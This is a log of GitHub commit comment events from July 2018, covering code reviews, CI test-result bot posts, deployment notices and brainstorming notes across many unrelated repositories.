{"id":"8018344513","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29833487,"position":null,"line":null,"path":null,"commit_id":"42d8b1b147cff3f626d0768cb44dc1a8be156873","created_at":"2018-07-25T18:47:01Z","updated_at":"2018-07-25T18:47:01Z","author_association":"NONE","body":"158270028_Issue#6422 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2946 of 2946 tests passed, 14 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MTR small diffs.\n * 2 tests had: BND diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: RDD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T18:47:01Z"}
{"id":"8018349017","type":"CommitCommentEvent","actor":{"login":"sukima"},"repo":{"name":"pangloss/vim-javascript"},"payload":{"comment":{"id":29833494,"position":104,"line":121,"path":"syntax/javascript.vim","commit_id":"a0d1abc172cd0d701c115b7c0197c5dfa288f278","created_at":"2018-07-25T18:47:52Z","updated_at":"2018-07-25T18:47:52Z","author_association":"NONE","body":"Both `javascript_conceal_static` and `javascript_conceal_super` were removed in this commit but the README still references them. Was it intentional to remove these?"}},"created_at":"2018-07-25T18:47:52Z"}
{"id":"8018349863","type":"CommitCommentEvent","actor":{"login":"Veldrovive"},"repo":{"name":"Veldrovive/MMM-Page-Selector"},"payload":{"comment":{"id":29833498,"position":null,"line":null,"path":null,"commit_id":"b0a72df54059ee1ae6a73b712dfb33e8b793f7af","created_at":"2018-07-25T18:48:02Z","updated_at":"2018-07-25T18:48:02Z","author_association":"OWNER","body":"Oh, and I also made it so that `defaultPage` can be used instead of the more confusing `page` config option."}},"created_at":"2018-07-25T18:48:02Z"}
{"id":"8018351346","type":"CommitCommentEvent","actor":{"login":"HLeithner"},"repo":{"name":"joomla-projects/gsoc18_cli_update"},"payload":{"comment":{"id":29833501,"position":null,"line":null,"path":null,"commit_id":"8beba78bf9dbb52a14f6265ef7a7975d326e4ae7","created_at":"2018-07-25T18:48:19Z","updated_at":"2018-07-25T18:48:19Z","author_association":"CONTRIBUTOR","body":"Documentation is missing for all constants"}},"created_at":"2018-07-25T18:48:19Z"}
{"id":"8018351719","type":"CommitCommentEvent","actor":{"login":"goodkov"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29833503,"position":null,"line":null,"path":null,"commit_id":"0ddbc4d66676c156c9c489e949e5008182c10f50","created_at":"2018-07-25T18:48:24Z","updated_at":"2018-07-25T18:48:24Z","author_association":"OWNER","body":"Yes.\r\nBut \"8/2b5/8/4n3/8/2B5/1Q6/8 w - - 0 1\" for attackedBy2 on knight do not attacked by 2 pieces\r\n"}},"created_at":"2018-07-25T18:48:24Z"}
{"id":"8018356209","type":"CommitCommentEvent","actor":{"login":"joelvh"},"repo":{"name":"RailsEventStore/rails_event_store"},"payload":{"comment":{"id":29833509,"position":18,"line":68,"path":"ruby_event_store-rom/lib/ruby_event_store/rom/repositories/events.rb","commit_id":"757b4ac85919a4f18b51d3a24288ecf740841fef","created_at":"2018-07-25T18:49:19Z","updated_at":"2018-07-25T18:49:19Z","author_association":"CONTRIBUTOR","body":"I think this will query all records. What was the issue with the previous approach?"}},"created_at":"2018-07-25T18:49:19Z"}
{"id":"8018365364","type":"CommitCommentEvent","actor":{"login":"annakijas1"},"repo":{"name":"annakijas1/Digital-Scholarship-Institute"},"payload":{"comment":{"id":29833524,"position":null,"line":null,"path":null,"commit_id":"78fcade5ff81e4b9f8896c7334db8194533a6c3e","created_at":"2018-07-25T18:51:01Z","updated_at":"2018-07-25T18:51:01Z","author_association":"OWNER","body":"@mdalmau can you delete this change? I forgot we were using the material from January 2018."}},"created_at":"2018-07-25T18:51:01Z"}
{"id":"8018369792","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":29833531,"position":null,"line":null,"path":null,"commit_id":"42fa6b2c28270333d5e7acc81e4de59e291e13c4","created_at":"2018-07-25T18:51:52Z","updated_at":"2018-07-25T18:51:52Z","author_association":"MEMBER","body":"That's weird... are you saying that the same call without `includedDeleted=true` works but with `includedDeleted=true` provides this exception ? Are you sure you are using the right tenant keys -- the error seems to indicate that you are trying to access the wrong tenant"}},"created_at":"2018-07-25T18:51:52Z"}
{"id":"8018375235","type":"CommitCommentEvent","actor":{"login":"BinduGanesh"},"repo":{"name":"BinduGanesh/ombin"},"payload":{"comment":{"id":29833540,"position":null,"line":null,"path":null,"commit_id":"d5c228ad3304398ffcd6d21ecbed7186cf7119c8","created_at":"2018-07-25T18:52:54Z","updated_at":"2018-07-25T18:52:54Z","author_association":"OWNER","body":"[https://tse2.mm.bing.net/th?id=OIP.gIyQaBUcz2e7hhHSy4HcjAHaEK&pid=15.1&P=0&w=269&h=152](url)"}},"created_at":"2018-07-25T18:52:54Z"}
{"id":"8018375544","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29833541,"position":null,"line":null,"path":null,"commit_id":"81063f491f981b98e6fadbac1c8a0f6b4285e25e","created_at":"2018-07-25T18:52:58Z","updated_at":"2018-07-25T18:52:58Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-280](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-280).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-280-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T18:52:58Z"}
{"id":"8018380710","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29833555,"position":null,"line":null,"path":null,"commit_id":"1afd639d7bc6dc8b5991eb03b8d2b633f86ea676","created_at":"2018-07-25T18:53:57Z","updated_at":"2018-07-25T18:53:57Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-48](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-48).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-48-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-25T18:53:57Z"}
{"id":"8018385253","type":"CommitCommentEvent","actor":{"login":"ledlamp"},"repo":{"name":"ledlamp/discord-mpp-bridge"},"payload":{"comment":{"id":29833564,"position":null,"line":null,"path":null,"commit_id":"4d99f27b610e129b0cfcdbf64d6c6d29db366880","created_at":"2018-07-25T18:54:49Z","updated_at":"2018-07-25T18:54:49Z","author_association":"OWNER","body":"dunno how i missed that"}},"created_at":"2018-07-25T18:54:49Z"}
{"id":"8018389639","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"jasondegraw/EnergyPlus"},"payload":{"comment":{"id":29833573,"position":null,"line":null,"path":null,"commit_id":"753c45b97a391b05fc27e5fc86f10adc084ac7e8","created_at":"2018-07-25T18:55:41Z","updated_at":"2018-07-25T18:55:41Z","author_association":"NONE","body":"fix-eio-wind-angles (jasondegraw) - x86_64-MacOS-10.9-clang: Tests Failed (1385 of 2924 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-753c45b97a391b05fc27e5fc86f10adc084ac7e8-PR6858-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-753c45b97a391b05fc27e5fc86f10adc084ac7e8-PR6858-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.37%25-red.png)</a> \n"}},"created_at":"2018-07-25T18:55:41Z"}
{"id":"8018391594","type":"CommitCommentEvent","actor":{"login":"VictoriaValentine"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29833579,"position":12,"line":12,"path":"making-of/brainstorm.md","commit_id":"8cc8b1605cdc68b55c126cbfaf7478f212ac7fad","created_at":"2018-07-25T18:56:02Z","updated_at":"2018-07-25T18:56:02Z","author_association":"COLLABORATOR","body":"Penny's mother becomes paranoid enought that she starts to send her to check in on the piano, as though there is a conspiracy headed by Manny that threatens the piano. Penny has become the piano's babysitter, now checking on it daily. Which is fine by her since she gets to spend time with Howard. As the amount of time Penny spends at the storage unit expands, Penny avoids conflict with her mother. Can she keep Howard a secret from her mother? How long can she keep her mother Helen the Hypochondriac a secret?"}},"created_at":"2018-07-25T18:56:02Z"}
{"id":"8018392308","type":"CommitCommentEvent","actor":{"login":"soulseekah"},"repo":{"name":"gravityview/GravityView"},"payload":{"comment":{"id":29833581,"position":19,"line":206,"path":"future/includes/rest/class-gv-rest-views-route.php","commit_id":"8854b70787da1c39038532221deff7dac7a28311","created_at":"2018-07-25T18:56:10Z","updated_at":"2018-07-25T18:56:10Z","author_association":"MEMBER","body":"IE2 will not support non-UTF8 files, will it?"}},"created_at":"2018-07-25T18:56:10Z"}
{"id":"8018394889","type":"CommitCommentEvent","actor":{"login":"alexax66"},"repo":{"name":"danwood76/android_device_samsung_a3xeltexx"},"payload":{"comment":{"id":29833586,"position":53,"line":53,"path":"hardware/power/Power.h","commit_id":"a4739d07f97e58b0f1f41312700339c22a3f8c54","created_at":"2018-07-25T18:56:40Z","updated_at":"2018-07-25T18:56:40Z","author_association":"NONE","body":"We have DT2W in /sys/android_touch/doubletap2wake\r\n"}},"created_at":"2018-07-25T18:56:40Z"}
{"id":"8018397237","type":"CommitCommentEvent","actor":{"login":"VictoriaValentine"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29833589,"position":14,"line":14,"path":"making-of/brainstorm.md","commit_id":"8cc8b1605cdc68b55c126cbfaf7478f212ac7fad","created_at":"2018-07-25T18:57:07Z","updated_at":"2018-07-25T18:57:07Z","author_association":"COLLABORATOR","body":"She is rescuing the piano from Manny threathening to auction it off... There is no where for Penny to move it to."}},"created_at":"2018-07-25T18:57:07Z"}
{"id":"8018398607","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29833592,"position":null,"line":null,"path":null,"commit_id":"ca3e476de5ca0291b02d07f8ccb5b4516a6b7d4d","created_at":"2018-07-25T18:57:21Z","updated_at":"2018-07-25T18:57:21Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-948](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-948).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-948-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-25T18:57:21Z"}
{"id":"8018399538","type":"CommitCommentEvent","actor":{"login":"alexax66"},"repo":{"name":"danwood76/android_device_samsung_a3xeltexx"},"payload":{"comment":{"id":29833595,"position":550,"line":550,"path":"hardware/power/Power.cpp","commit_id":"a4739d07f97e58b0f1f41312700339c22a3f8c54","created_at":"2018-07-25T18:57:32Z","updated_at":"2018-07-25T18:57:32Z","author_association":"NONE","body":"Uncomment this  "}},"created_at":"2018-07-25T18:57:32Z"}
{"id":"8018401078","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29833597,"position":null,"line":null,"path":null,"commit_id":"e30679978bb664130751e9bae64aae035520a85b","created_at":"2018-07-25T18:57:51Z","updated_at":"2018-07-25T18:57:51Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-154](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-154).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-154-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-25T18:57:51Z"}
{"id":"8018401845","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29833600,"position":null,"line":null,"path":null,"commit_id":"03fdd1b0d597613250c017996c8acfbacd22aa3c","created_at":"2018-07-25T18:57:59Z","updated_at":"2018-07-25T18:57:59Z","author_association":"COLLABORATOR","body":"Please note that this file is not yet fully-specific for the MIS implemented thus far and is not a complete test either (e.g. many cases can be added to SeqServices testing)."}},"created_at":"2018-07-25T18:57:59Z"}
{"id":"8018404813","type":"CommitCommentEvent","actor":{"login":"fathoniadi"},"repo":{"name":"fathoniadi/cloud-2018"},"payload":{"comment":{"id":29833604,"position":null,"line":null,"path":null,"commit_id":"b57dfe71c63592f2969b33c3f5b9a952e645ad62","created_at":"2018-07-25T18:58:33Z","updated_at":"2018-07-25T18:58:33Z","author_association":"OWNER","body":"Cek"}},"created_at":"2018-07-25T18:58:33Z"}
{"id":"8018411503","type":"CommitCommentEvent","actor":{"login":"VictoriaValentine"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29833608,"position":16,"line":16,"path":"making-of/brainstorm.md","commit_id":"8cc8b1605cdc68b55c126cbfaf7478f212ac7fad","created_at":"2018-07-25T18:59:53Z","updated_at":"2018-07-25T18:59:53Z","author_association":"COLLABORATOR","body":"Penny has a choice to make \"Everyone has problems. Is it a crime to want what is best for everyone? Is empathy now a crime?\" "}},"created_at":"2018-07-25T18:59:53Z"}
{"id":"8018423176","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29833636,"position":null,"line":null,"path":null,"commit_id":"f89dd35cbc102df55a14386bd9f385a31c4aa525","created_at":"2018-07-25T19:02:01Z","updated_at":"2018-07-25T19:02:01Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-544](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-544).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-544-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-25T19:02:01Z"}
{"id":"8018432110","type":"CommitCommentEvent","actor":{"login":"kevmoo"},"repo":{"name":"dart-lang/pub_semver"},"payload":{"comment":{"id":29833715,"position":6,"line":6,"path":".travis.yml","commit_id":"7b2549d1f57d9311f5525c761ce7627bdb6e6d27","created_at":"2018-07-25T19:03:49Z","updated_at":"2018-07-25T19:03:49Z","author_association":"MEMBER","body":"No! Seems a waste of CPU"}},"created_at":"2018-07-25T19:03:49Z"}
{"id":"8018432487","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29833719,"position":null,"line":null,"path":null,"commit_id":"6da8f0f00cb1e952041057f71fd6a31e599e6c04","created_at":"2018-07-25T19:03:54Z","updated_at":"2018-07-25T19:03:54Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-280](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-280).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-280-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T19:03:54Z"}
{"id":"8018436995","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29833729,"position":null,"line":null,"path":null,"commit_id":"73281ffba303cbd55bfa8f4e7e5646843f39866d","created_at":"2018-07-25T19:04:46Z","updated_at":"2018-07-25T19:04:46Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2342 of 2342 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-73281ffba303cbd55bfa8f4e7e5646843f39866d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T19:04:46Z"}
{"id":"8018441120","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29833736,"position":10,"line":10,"path":"testing/frr/frr.pre-install","commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-25T19:05:38Z","updated_at":"2018-07-25T19:05:38Z","author_association":"MEMBER","body":"This is not how user creation should be written. We have quite standard pattern for this, used in ~99 % of aports."}},"created_at":"2018-07-25T19:05:38Z"}
{"id":"8018445186","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29833742,"position":4,"line":4,"path":"testing/frr/frr.pre-deinstall","commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-25T19:06:28Z","updated_at":"2018-07-25T19:06:28Z","author_association":"MEMBER","body":"pre-deinstall script should never stop the service! This is admin's responsibility, not apk's. Alpine is not Debian."}},"created_at":"2018-07-25T19:06:28Z"}
{"id":"8018445832","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29833743,"position":77,"line":60,"path":"tests/TicTacToeTest.php","commit_id":"1fe8501de16f4b6fd3220c9d79a4190b04468162","created_at":"2018-07-25T19:06:36Z","updated_at":"2018-07-25T19:06:36Z","author_association":"NONE","body":"There's no variable named `$marks`."}},"created_at":"2018-07-25T19:06:36Z"}
{"id":"8018446878","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/haxe-formatter"},"payload":{"comment":{"id":29833746,"position":5,"line":37,"path":"src/formatter/config/WhitespaceConfig.hx","commit_id":"2352070d616c080a164cb953a1483499a1b5b8f1","created_at":"2018-07-25T19:06:49Z","updated_at":"2018-07-25T19:06:49Z","author_association":"MEMBER","body":"Hm.. I'm not sure I like putting Haxe versions in the names here. Might look strange when we're at Haxe 5, or imply that the Haxe 3 syntax no longer works... Maybe just \"new\" and \"old\"? That's also what the proposal calls it:\r\n\r\nhttps://github.com/HaxeFoundation/haxe-evolution/blob/master/proposals/0003-new-function-type.md"}},"created_at":"2018-07-25T19:06:49Z"}
{"id":"8018449507","type":"CommitCommentEvent","actor":{"login":"HanSolo"},"repo":{"name":"HanSolo/tilesfx"},"payload":{"comment":{"id":29833756,"position":null,"line":null,"path":null,"commit_id":"37f823d8c77c60915847395d3bd6b096ade949a6","created_at":"2018-07-25T19:07:23Z","updated_at":"2018-07-25T19:07:23Z","author_association":"OWNER","body":"nope you can simply download the jar file from bintray or use maven and maven central"}},"created_at":"2018-07-25T19:07:23Z"}
{"id":"8018454812","type":"CommitCommentEvent","actor":{"login":"yrsegal"},"repo":{"name":"TeamWizardry/LibrarianLib"},"payload":{"comment":{"id":29833767,"position":4,"line":6,"path":"src/main/java/com/teamwizardry/librarianlib/features/gui/provided/book/hierarchy/book/Book.kt","commit_id":"58a577732b2ed2c876b6e2d5e57b9321033f30d8","created_at":"2018-07-25T19:08:27Z","updated_at":"2018-07-25T19:08:27Z","author_association":"MEMBER","body":"my dude."}},"created_at":"2018-07-25T19:08:27Z"}
{"id":"8018455263","type":"CommitCommentEvent","actor":{"login":"yrsegal"},"repo":{"name":"TeamWizardry/LibrarianLib"},"payload":{"comment":{"id":29833768,"position":12,"line":18,"path":"src/main/java/com/teamwizardry/librarianlib/features/gui/provided/book/hierarchy/book/Book.kt","commit_id":"58a577732b2ed2c876b6e2d5e57b9321033f30d8","created_at":"2018-07-25T19:08:32Z","updated_at":"2018-07-25T19:08:32Z","author_association":"MEMBER","body":"my dude."}},"created_at":"2018-07-25T19:08:32Z"}
{"id":"8018455811","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29833769,"position":19,"line":25,"path":"1/right_triangle.rb","commit_id":"789abbaa7c66e1d657b41d76235eab5aa7b0d8fd","created_at":"2018-07-25T19:08:39Z","updated_at":"2018-07-25T19:08:39Z","author_association":"NONE","body":"Только тут порядок имеет значение. При текущей реализации, если треугольник прямоугольный - мы зайдем в ветку if даже, если он будет равнобедренным."}},"created_at":"2018-07-25T19:08:39Z"}
{"id":"8018457698","type":"CommitCommentEvent","actor":{"login":"jblotus"},"repo":{"name":"jblotus/print-any-html"},"payload":{"comment":{"id":29833774,"position":null,"line":null,"path":null,"commit_id":"b688d3a69ab6cc296be382e904760445a1b80335","created_at":"2018-07-25T19:09:02Z","updated_at":"2018-07-25T19:09:02Z","author_association":"OWNER","body":"based on https://stackoverflow.com/a/24953075/238350"}},"created_at":"2018-07-25T19:09:02Z"}
{"id":"8018463978","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29833803,"position":13,"line":20,"path":"1/right_triangle.rb","commit_id":"789abbaa7c66e1d657b41d76235eab5aa7b0d8fd","created_at":"2018-07-25T19:10:19Z","updated_at":"2018-07-25T19:10:19Z","author_association":"NONE","body":"```\r\nhypo**2 == catet1**2 + catet2**2\r\n```\r\nЭто выражение и так возвращает нам true/false\r\nПочему сразу не присвоить его переменной вот так?\r\n```\r\nrectangular = hypo**2 == catet1**2 + catet2**2\r\n```\r\n"}},"created_at":"2018-07-25T19:10:19Z"}
{"id":"8018465221","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29833808,"position":66,"line":57,"path":"tests/TicTacToeTest.php","commit_id":"1fe8501de16f4b6fd3220c9d79a4190b04468162","created_at":"2018-07-25T19:10:34Z","updated_at":"2018-07-25T19:10:34Z","author_association":"NONE","body":"In this test scenario, I don't see any moves being done by either player. This test must have lines which look like this:\r\n\r\n`$playerX->putMark(0, 0);`\r\n\r\nfor example, which tell exactly the story of how once upon a time, two players X and 0 played and which exact moves they did each, so that in the end, the player playing with X won.\r\n\r\nI cannot read this story in the code of this test. Thus, the implementation of the test does not tell the story which is announced in the headline of the test `player_x_won_the_game`."}},"created_at":"2018-07-25T19:10:34Z"}
{"id":"8018466166","type":"CommitCommentEvent","actor":{"login":"skydivin4ng3l"},"repo":{"name":"hpi-swa-teaching/RatPack2.0"},"payload":{"comment":{"id":29833812,"position":null,"line":null,"path":null,"commit_id":"91bfbf0be674c321eb592b01e73f1352c256a1ea","created_at":"2018-07-25T19:10:46Z","updated_at":"2018-07-25T19:10:46Z","author_association":"NONE","body":"Sorry did skipt the commit message, can we still change that to: \"added baseline command to setup and formating of help files.\""}},"created_at":"2018-07-25T19:10:46Z"}
{"id":"8018467425","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29833816,"position":75,"line":58,"path":"tests/TicTacToeTest.php","commit_id":"1fe8501de16f4b6fd3220c9d79a4190b04468162","created_at":"2018-07-25T19:11:02Z","updated_at":"2018-07-25T19:11:02Z","author_association":"NONE","body":"In this test scenario, I don't see any moves being done by either player. This test must have lines which look like this:\r\n\r\n`$playerX->putMark(0, 0);`\r\n\r\nfor example, which tell exactly the story of how once upon a time, two players X and 0 played and which exact moves they did each, so that in the end, the player playing with X won.\r\n\r\nI cannot read this story in the code of this test. Thus, the implementation of the test does not tell the story which is announced in the headline of the test `player_x_won_the_game`."}},"created_at":"2018-07-25T19:11:02Z"}
{"id":"8018467678","type":"CommitCommentEvent","actor":{"login":"fathoniadi"},"repo":{"name":"rizkanns/kp-telkom"},"payload":{"comment":{"id":29833817,"position":null,"line":null,"path":null,"commit_id":"780390dc32acb1f0423a635ab88055223e9936c2","created_at":"2018-07-25T19:11:06Z","updated_at":"2018-07-25T19:11:06Z","author_association":"NONE","body":"FYI aja\r\n\r\nKalo pingin lebih rapi bikin branch\r\n1. Master : buat production\r\n2. Development : buat naruh hal yang belum ready production\r\n3. Branch fitur beserta penanggung jawab, contoh branch:\r\nBudi/login\r\n\r\nSetiap fitur harus dibikin branch masing-masing. Kalo dirasa fitur yang dikerjain udah selesai. Pindah ke branch Development dulu terus pull. Kalo udah selesai pull, merge branch development ke branch fitur yang lagi dikerjain. Nah pas proses ini, kalo ada yang konflik, jadi branch development gak bakal rusak dan bisa langsung diperbaiki soalnya branch setiap fitur yang harus bertanggung jawab merging ya si pembuat, jadi otomatis tau mana baris code yang bener. Kalo udah selesai merge branch development ke fitur yang lagi dikerjain, gantian merge branch fitur yang lagi dikerjain ke development. Kalo semua use case udah selesai, branch development di test semua fiturnya. Kalo udah oke semua, baru merge master"}},"created_at":"2018-07-25T19:11:06Z"}
{"id":"8018468571","type":"CommitCommentEvent","actor":{"login":"krubenrc"},"repo":{"name":"peers/peerjs"},"payload":{"comment":{"id":29833820,"position":null,"line":null,"path":null,"commit_id":"73d9173c3ee15d49862d22c19c87c6c70465edab","created_at":"2018-07-25T19:11:16Z","updated_at":"2018-07-25T19:11:16Z","author_association":"NONE","body":"In the peer.js file you have rewrite the version to 0.3.15, but after, in package.json you have rewrite to 0.3.16, so, what versión its?"}},"created_at":"2018-07-25T19:11:16Z"}
{"id":"8018470035","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29833822,"position":6,"line":6,"path":"testing/frr/frr.post-deinstall","commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-25T19:11:34Z","updated_at":"2018-07-25T19:11:34Z","author_association":"MEMBER","body":"@fabled post-deinstall script should NEVER remove ANY users or groups! How you can know that the user/groups has been created by this aport and not by admin? How you can know that there are no existing files owned by the user/group left? This may be a serious security risk - think about UID/GIDs recycling.\r\n\r\nI (and many others) use Alpine because (among many other reasons) we don't do such stupidities as starting service automatically after installation, automatically removing users/groups when uninstalling etc. You **should** now that and you should not accept such patch.\r\n\r\n/cc @ncopa @kaniini"}},"created_at":"2018-07-25T19:11:34Z"}
{"id":"8018474761","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29833857,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-25T19:12:33Z","updated_at":"2018-07-25T19:12:33Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-25T19:12:33Z"}
{"id":"8018477507","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29833889,"position":75,"line":58,"path":"tests/TicTacToeTest.php","commit_id":"1fe8501de16f4b6fd3220c9d79a4190b04468162","created_at":"2018-07-25T19:13:06Z","updated_at":"2018-07-25T19:13:06Z","author_association":"NONE","body":"You simply have to translate into code 1:1 a story from real-life. Imagine how you and your friend play the game and... write it down, in code which resembles all the actions takes.\r\n\r\nVery simple and natural, nothing fancy."}},"created_at":"2018-07-25T19:13:06Z"}
{"id":"8018481200","type":"CommitCommentEvent","actor":{"login":"VictoriaValentine"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29833916,"position":17,"line":17,"path":"making-of/brainstorm.md","commit_id":"8cc8b1605cdc68b55c126cbfaf7478f212ac7fad","created_at":"2018-07-25T19:13:51Z","updated_at":"2018-07-25T19:13:51Z","author_association":"COLLABORATOR","body":"When she confronts her mother about her refusal she must also face the choice to tell her or not tell her about Howard. As her mother's task rabbit, she will be forced to meet the conflict arising out of her increasing absence? Will she lie or as a character riddled with guilt how far will she stretch the truth without revealing and admitting her own interest and desires. "}},"created_at":"2018-07-25T19:13:51Z"}
{"id":"8018481433","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29833918,"position":11,"line":11,"path":"testing/frr/APKBUILD","commit_id":"6c21984c5b86ca03c72a88927f8c1de0c420e25f","created_at":"2018-07-25T19:13:54Z","updated_at":"2018-07-25T19:13:54Z","author_association":"MEMBER","body":"There's no package named `python`. It should be `python2` or `python3`. `python` is provide of `python2` and it should be used only for backward compatibility."}},"created_at":"2018-07-25T19:13:54Z"}
{"id":"8018484149","type":"CommitCommentEvent","actor":{"login":"mads-hartmann"},"repo":{"name":"mads-hartmann/scalafmt"},"payload":{"comment":{"id":29833927,"position":null,"line":null,"path":null,"commit_id":"5a6033ed7c7fc87963377f26bb1a3c129279056e","created_at":"2018-07-25T19:14:28Z","updated_at":"2018-07-25T19:14:28Z","author_association":"OWNER","body":"@gabro Yep, works like a charm ;)"}},"created_at":"2018-07-25T19:14:28Z"}
